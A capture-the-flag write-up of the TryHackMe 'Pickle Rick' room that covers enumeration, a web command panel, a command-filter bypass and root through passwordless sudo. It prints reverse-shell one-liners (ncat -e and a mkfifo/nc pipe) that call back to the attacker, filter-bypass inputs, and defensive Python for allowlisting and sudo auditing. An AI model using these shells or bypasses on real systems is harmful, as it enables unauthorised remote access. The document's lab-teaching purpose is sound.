Pickle Rick – A TryHackMe Writeup

This article is a write-up of the TryHackMe Room “Pickle Rick”. I will explain my way of tackling this room and show you the solution that worked for me. No flags will be shown!

Link to the room: https://tryhackme.com/room/picklerick

Difficulty: Easy
Time: 15-30 minutes, depending on your knowledge

Prerequisites

  • Connect to the TryHackMe VPN and find your IP address
  • Start the room and note the IP address of your server

I suggest you store the target's IP address in a shell variable; this makes it easier to follow along with the commands in this guide.

IP=SERVER_IP

All commands were tested on a "fresh" Kali Linux installation. If you are using a different OS, you might need to adjust parts of these commands.

Task 1: What is the first ingredient Rick needs?

As always we start by enumerating the target. nmap comes first, to see which services are exposed and therefore which attack vectors we have.

> nmap -sC -sV $IP

┌──(diddy㉿kali)
└─$ nmap -sC -sV $IP  
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-07 21:46 CET
Nmap scan report for 10.10.242.71
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 77b416abb7da3568c0418343b10f3b37 (RSA)
|   256 300d26e4d9488c850140ccc3fe0af8ca (ECDSA)
|_  256 a666cb029cf4e6265829454c8f97bc2d (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.01 seconds

As we can see the server has ports 22 (SSH) and 80 (HTTP) open. Let's start gobuster and nikto to look for interesting directories and other useful information. While these tools are running we can take a look at the website served on port 80.

[Image: Pickle Rick web server homepage]

There is nothing interesting at first glance, but if we look at the page source we find the first hint.

  <!--

    Note to self, remember username!

    Username: *********

  -->

Nice, let’s write that down for later!

Nikto and gobuster should be done by now so let’s see what the result is:

┌──(diddy㉿kali)
└─$ nikto --url http://$IP
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.242.71
+ Target Hostname:    10.10.242.71
+ Target Port:        80
+ Start Time:         2022-11-07 21:49:39 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.

The last line of the nikto output looks interesting; let's note /login.php for later.

┌──(diddy㉿kali)-[~]
└─$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt dir -u http://10.10.242.71
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.242.71
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/07 21:55:26 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.242.71/assets/]
Progress: 81620 / 81644 (99.97%)
===============================================================
2022/11/07 22:01:42 Finished
===============================================================

Gobuster did not find anything useful: the /assets directory contains a few neat images and GIFs, but nothing that helps us here. Note that a plain directory scan like the one above does not try file names, which is why login.php and robots.txt do not show up in this list; adding -x php,txt to the gobuster command tells it to try those file extensions as well.

[Image: /assets directory]

Let’s check out the login page.

[Image: /login.php]

While we do have a username, we do not have a password. We could brute force it, but there is one more place to check for hints first. Most websites have a /robots.txt that tells crawlers which paths they may and may not access, and it is a classic place for leftover notes. Maybe there is something useful in that file? Indeed! While we cannot be 100% sure what it is, the entry in it looks like a password.

Together with the username we found earlier we should be able to log in.

[Image: Command Panel]

We are greeted with a "Command Panel". Whatever we type here is executed as a shell command on the server and the output is sent back, so at this point we already have remote command execution as the web server user. Let's try some commands.

> ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

Sup3rS3cretPickl3Ingred.txt and clue.txt look interesting, let's see what's inside them.

> cat Sup3rS3cretPickl3Ingred.txt
command disabled

Okay, that did not work. The panel seems to filter a list of forbidden command names, and cat is on it. A filter like this only blocks the exact word, so let's try another tool that can read a file.

> less Sup3rS3cretPickl3Ingred.txt
**. ****** ****

That works. We have our first ingredient. Now let’s see what the clue is.

> less clue.txt
Look around the file system for the other ingredient.

Alright, easy enough.
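
To make clear why a filter like the panel's is so weak, here is an added Python example (my own reconstruction, not the room's portal.php, whose source we never see). It models the observed behaviour, a denylist of command names in front of a shell, with a hypothetical DENYLIST and ALLOWLIST, shows six constructed inputs that still read the file, and contrasts it with the safer design: parse the line like a shell would, allow only by the resolved program name, and execute an argument list without any shell.

```python
"""Hypothetical model of the Pickle Rick command panel filter and a safer design.

This is added example code, not the room's portal.php (whose source we never
see). Only the observable behaviour is taken from the room: 'cat' and 'ncat'
answer "command disabled" while 'less' runs. Everything else is an assumption.
"""
import shlex
import subprocess

# Assumed denylist of command names (the room reveals only cat and ncat).
DENYLIST = {"cat", "ncat", "nc", "bash"}

# Assumed allowlist for the hardened variant. Keep it to binaries that cannot
# spawn other programs: less (!sh), vim, find -exec etc. would re-open the hole.
ALLOWLIST = {"ls", "id", "whoami", "head", "echo"}

SHELL_META = set("|;&$`<>()\n")


def denylist_panel(cmd: str) -> str:
    """The weak filter: blocks only when the first word is on the denylist.

    Anything else is returned unchanged, standing in for the string the real
    panel hands to a shell (shell_exec-style behaviour is an assumption).
    """
    words = cmd.strip().split()
    if words and words[0] in DENYLIST:
        return "command disabled"
    return cmd


# Constructed inputs that read a file despite 'cat' being blocked. The first
# three use other binaries; the last three are still 'cat' once a shell has
# parsed the line (absolute path, empty quotes, backslash escape).
BYPASSES = [
    "less Sup3rS3cretPickl3Ingred.txt",
    "head Sup3rS3cretPickl3Ingred.txt",
    "tac Sup3rS3cretPickl3Ingred.txt",
    "/bin/cat Sup3rS3cretPickl3Ingred.txt",
    "c''at Sup3rS3cretPickl3Ingred.txt",
    "ca\\t Sup3rS3cretPickl3Ingred.txt",
]


def denylist_bypasses() -> list:
    """Return every constructed bypass that the denylist lets through."""
    return [b for b in BYPASSES if denylist_panel(b) != "command disabled"]


def allowlist_argv(cmd: str):
    """Hardened decision: parse like a shell, then allow by resolved argv[0].

    Returns the argv list to execute *without* a shell, or None to refuse.
    Parsing with shlex first means c''at and ca\\t resolve to 'cat' before the
    check; refusing shell metacharacters stops chaining even though argv
    execution would treat them as literal arguments anyway (defence in depth).
    """
    try:
        argv = shlex.split(cmd)
    except ValueError:          # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWLIST:
        return None
    if any(SHELL_META & set(arg) for arg in argv):
        return None
    return argv


def run_allowlisted(cmd: str) -> str:
    """Execute an allowlisted command as an argv list (no shell involved)."""
    argv = allowlist_argv(cmd)
    if argv is None:
        return "command disabled"
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=5)
    return (proc.stdout + proc.stderr).strip()


if __name__ == "__main__":
    for b in denylist_bypasses():
        print("denylist lets through:", b)
    for attempt in ["c''at /etc/passwd", "ls; cat /etc/passwd", "ls | id"]:
        print(attempt, "->", allowlist_argv(attempt))
    print(run_allowlisted("echo still works for allowlisted commands"))
```

The real lesson is the last function: once the command is an argument list handed to the kernel instead of a string handed to a shell, quoting tricks and chaining stop mattering, and the allowlist only has to worry about what the listed binaries themselves can do.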

Task 2: What's the second ingredient Rick needs?

How about we check for all users with a home directory?

> ls /home
rick
ubuntu

> ls /home/rick
second ingredients

Looks like the second ingredient is located in Rick's home directory. Let's check it! The file name contains a space, so it has to be escaped (or the whole path quoted).

> less /home/rick/second\ ingredients
* **** ****

Alright, so far so good.

Task 3: What's the third ingredient Rick needs?

Now we only need to find the last ingredient. Since the final answer is usually located in the /root directory, we need to escalate our privileges to root first, or find a way to execute commands with sudo.

I found two ways to get to the last ingredient. I am not sure which one is the intended way, but let's start with the easy one. If you are curious you can check out the "harder" one after this.

Task 3.1 The easy way

As per tradition, the last answer is located in the /root directory, which can only be read by the root user or by a user who can run commands as root. A simple way to check whether the current user has sudo rights is to run a harmless command like ls with sudo. The command panel has no terminal, so sudo cannot prompt for a password; if we get output anyway, the rule must be NOPASSWD. (sudo -l lists the exact rules and is the more precise check.)

> sudo ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt

Yup, there is the output. The user running the web server (www-data) can use sudo WITHOUT a password. That is bad: it turns a command injection in the web application directly into a root compromise. Let's find the final ingredient.

> sudo ls /root
3rd.txt
snap

> sudo less /root/3rd.txt
3rd ingredients: ***** *****

With this answer we have completed the room. Nice!
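
Checking sudo rights by hand is fine for one box, but it helps to have a small parser for sudo -l output when triaging many shells. The following Python is an added example, not part of the original write-up; the two sudo -l samples in it are constructed (one modelled on the www-data situation in this room, one limited rule set for comparison), not captured from the target.

```python
"""Parse `sudo -l` output and flag rules that give root without a password.

Added example code, not from the room. Both samples below are constructed:
SAMPLE_ROOM mirrors the situation the room exposes (www-data may run ALL with
NOPASSWD), SAMPLE_LIMITED is a made-up restricted rule set for comparison.
"""
import re

SAMPLE_ROOM = """\
Matching Defaults entries for www-data on ip-10-10-242-71:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User www-data may run the following commands on ip-10-10-242-71:
    (ALL) NOPASSWD: ALL
"""

SAMPLE_LIMITED = """\
User alice may run the following commands on host1:
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (root) /usr/bin/apt-get update, /usr/bin/apt-get upgrade
"""

# One rule line: "(runas[ : rungroup]) [TAG: ...] cmd[, cmd...]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_rules(text: str) -> list:
    """Extract every rule line from sudo -l output into plain dicts."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue                      # Defaults, headers, continuation lines
        runas = m.group("runas").split(":")[0].strip()
        tags = {t.strip(": ").upper() for t in m.group("tags").split() if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"runas": runas, "nopasswd": "NOPASSWD" in tags, "commands": cmds})
    return rules


def unrestricted_root(rules: list) -> bool:
    """True when a rule runs ALL as root (or ALL) with no password: game over."""
    return any(
        r["nopasswd"] and r["runas"] in ("ALL", "root") and "ALL" in r["commands"]
        for r in rules
    )


def passwordless_commands(rules: list) -> list:
    """Commands usable from a non-interactive shell, where no password can be typed.

    Anything listed here still needs a case-by-case look: a single allowed
    binary that can spawn a shell or write arbitrary files is also root.
    """
    return [c for r in rules if r["nopasswd"] for c in r["commands"]]


if __name__ == "__main__":
    for name, sample in (("room", SAMPLE_ROOM), ("limited", SAMPLE_LIMITED)):
        rules = parse_sudo_rules(sample)
        print(name, "unrestricted root:", unrestricted_root(rules))
        print(name, "passwordless:", passwordless_commands(rules))
```

In practice you would feed it the real output (for example sudo -l -n, which fails instead of hanging when a password would be required) and look at unrestricted_root first; in this room it is True, which is exactly why sudo ls worked from the panel.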

Task 3.2 The hard way

Since I did not expect this room to give me the last answer that easily, I started a netcat reverse shell from the command panel.

On my local machine I started an nc listener with:

> nc -lnvp $PORT

In the command panel I tried to execute this command to create the shell:

> ncat -e /bin/bash $YOURIP $PORT 

The first command I tried was disabled (ncat is filtered just like cat), so I used this well-known one-liner instead (credit to its original author):

> rm -f /tmp/b; mkfifo /tmp/b; /bin/sh -i 2>&1 0</tmp/b | nc $YOURIP $PORT 1>/tmp/b

It creates a named pipe in /tmp, starts an interactive shell that reads its commands from that pipe, and sends the shell's output (stdout and stderr) through nc to our listener; whatever the listener sends back is written into the pipe and becomes the shell's input. That way we get a two-way shell without needing the -e option of nc. The listener on my machine then showed:

┌──(diddy㉿kali)
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.21.146] from (UNKNOWN) [10.10.242.71] 45248
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
ip-10-10-242-71
$ 

Next I tried to gain access to the root user with:

> sudo su
> whoami
root

And then finally I tried finding the third ingredient in the root directory.

> ls /root
3rd.txt
snap

> less /root/3rd.txt
3rd ingredients: ***** *****

Was it overkill? Yes. Was it way more fun? Absolutely!

The End

That was the room “Pickle Rick”. I hope everything was clear. If not, please let me know. I will try to answer all questions that come up.
